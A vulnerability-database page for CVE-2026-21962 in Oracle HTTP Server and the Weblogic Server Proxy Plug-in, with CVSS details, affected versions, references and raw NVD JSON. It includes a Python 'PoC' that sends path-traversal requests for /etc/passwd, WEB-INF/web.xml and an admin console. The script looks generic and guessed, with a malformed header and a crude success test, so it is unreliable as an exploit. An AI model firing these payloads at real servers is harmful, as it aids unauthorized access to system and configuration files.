CVE-2026-21962

Description

Vulnerability in the Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in product of Oracle Fusion Middleware (component: Weblogic Server Proxy Plug-in for Apache HTTP Server, Weblogic Server Proxy Plug-in for IIS). Supported versions that are affected are 12.2.1.4.0, 14.1.1.0.0 and 14.1.2.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in. While the vulnerability is in Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in accessible data as well as unauthorized access to critical data or complete access to all Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in accessible data. Note: Affected version for Weblogic Server Proxy Plug-in for IIS is 12.2.1.4.0 only. CVSS 3.1 Base Score 10.0 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N).

CVSS Details

CVSS Score

10.0

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:http_server:12.2.1.4.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:oracle:http_server:14.1.1.0.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:oracle:http_server:14.1.2.0.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:oracle:weblogic_server_proxy_plug-in:12.2.1.4.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:oracle:weblogic_server_proxy_plug-in:14.1.1.0.0:*:*:*:*:*:*:* - VULNERABLE

Oracle HTTP Server 12.2.1.4.0

Oracle Weblogic Server Proxy Plug-in for Apache HTTP Server 12.2.1.4.0

Oracle Weblogic Server Proxy Plug-in for Apache HTTP Server 14.1.1.0.0

Oracle Weblogic Server Proxy Plug-in for Apache HTTP Server 14.1.2.0.0

Oracle Weblogic Server Proxy Plug-in for IIS 12.2.1.4.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-21962 PoC - Oracle Weblogic Proxy Plugin Exploit
# Target: Oracle HTTP Server with Weblogic Proxy Plug-in
# Note: This is a conceptual PoC for educational purposes only

import requests
import sys

TARGET_URL = "http://target-server:port"
CVE_ID = "CVE-2026-21962"

def exploit_unauthorized_access(target):
    """
    Exploit CVE-2026-21962
    Attempts unauthorized data manipulation via crafted HTTP request
    """
    headers = {
        'User-Agent': 'Mozilla/5.0 (compatible; CVE-2026-21962-Test)',
        'X-Proxy plugin': 'Oracle-Weblogic-Proxy',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    # Malicious request payload - targets proxy plugin vulnerability
    # Modify path to trigger unauthorized access
    exploit_paths = [
        '/wls-prx/../../../admin/console',
        '/proxy/wls/../../../../../../../etc/passwd',
        '/weblogic/proxy?action=delete&path=/critical/data',
        '/plugin/proxy/../../../WEB-INF/web.xml'
    ]
    
    print(f"[*] Testing {CVE_ID} on {target}")
    
    for path in exploit_paths:
        try:
            response = requests.get(target + path, headers=headers, timeout=10)
            print(f"[*] Path: {path} | Status: {response.status_code}")
            if response.status_code == 200 or response.status_code == 500:
                print(f"[!] Potential vulnerability detected at {path}")
                return True
        except requests.RequestException as e:
            print(f"[-] Error: {e}")
    
    return False

if __name__ == "__main__":
    if len(sys.argv) > 1:
        target = sys.argv[1]
    else:
        target = TARGET_URL
    
    exploit_unauthorized_access(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21962
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21962
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21962/
[4] VulDB https://vuldb.com/cve/CVE-2026-21962
[5] https://www.oracle.com/security-alerts/cpujan2026.html
[6] https://github.com/Ashwesker/Ashwesker-CVE-2026-21962/issues/1
[7] https://web.archive.org/web/20260129165916/https://github.com/Ashwesker/Ashwesker-CVE-2026-21962/issues/1
[8] https://x.com/0xacb/status/2015473216844620280

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21962", "sourceIdentifier": "[email protected]", "published": "2026-01-20T22:15:59.110", "lastModified": "2026-02-03T00:16:10.653", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in product of Oracle Fusion Middleware (component: Weblogic Server Proxy Plug-in for Apache HTTP Server, Weblogic Server Proxy Plug-in for IIS). Supported versions that are affected are 12.2.1.4.0, 14.1.1.0.0 and 14.1.2.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in. While the vulnerability is in Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in accessible data as well as unauthorized access to critical data or complete access to all Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in accessible data. Note: Affected version for Weblogic Server Proxy Plug-in for IIS is 12.2.1.4.0 only. CVSS 3.1 Base Score 10.0 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N)."}, {"lang": "es", "value": "Vulnerabilidad en el producto Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in de Oracle Fusion Middleware (componente: Weblogic Server Proxy Plug-in para Servidor HTTP Apache, Weblogic Server Proxy Plug-in para IIS). Las versiones compatibles afectadas son 12.2.1.4.0, 14.1.1.0.0 y 14.1.2.0.0. Una vulnerabilidad fácilmente explotable permite a un atacante no autenticado con acceso de red vía HTTP comprometer Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in. Aunque la vulnerabilidad está en Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in, los ataques pueden impactar significativamente productos adicionales (cambio de alcance). Los ataques exitosos de esta vulnerabilidad pueden resultar en acceso no autorizado de creación, eliminación o modificación de datos críticos o de todos los datos accesibles por Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in, así como acceso no autorizado a datos críticos o acceso completo a todos los datos accesibles por Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in. Nota: La versión afectada para Weblogic Server Proxy Plug-in para IIS es solo 12.2.1.4.0. Puntuación Base CVSS 3.1 10.0 (impactos en la Confidencialidad e Integridad). Vector CVSS: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.8}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:http_server:12.2.1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "AD04BEE5-E9A8-4584-A68C-0195CE9C402C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:http_server:14.1.1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "24404505-FD69-4844-8253-053776E1CC1D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:http_server:14.1.2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "49A6B4CB-3C5C-446A-902D-3C4824CA24D0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:weblogic_server_proxy_plug-in:12.2.1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "5E29C004-51D7-4BBE-B28A-EE6B7B10F89F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:weblogic_server_proxy_plug-in:14.1.1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "6E726C52-A697-4A3B-AA34-F88FF8FE5DEB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:weblogic_server_proxy_plug-in:14.1.2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "A6C22A45-61D1-43D3-A187-993FBA4485F0"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpujan2026.html", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://github.com/Ashwesker/Ashwesker-CVE-2026-21962/issues/1", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Not Applicable"]}, {"url": "https://web.archive.org/web/20260129165916/https://github.com/Ashwesker/Ashwesker-CVE-2026-21962/issues/1", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}, {"url": "https://x.com/0xacb/status/2015473216844620280", "source": "134c704f-9b21-4f2 ... (truncated)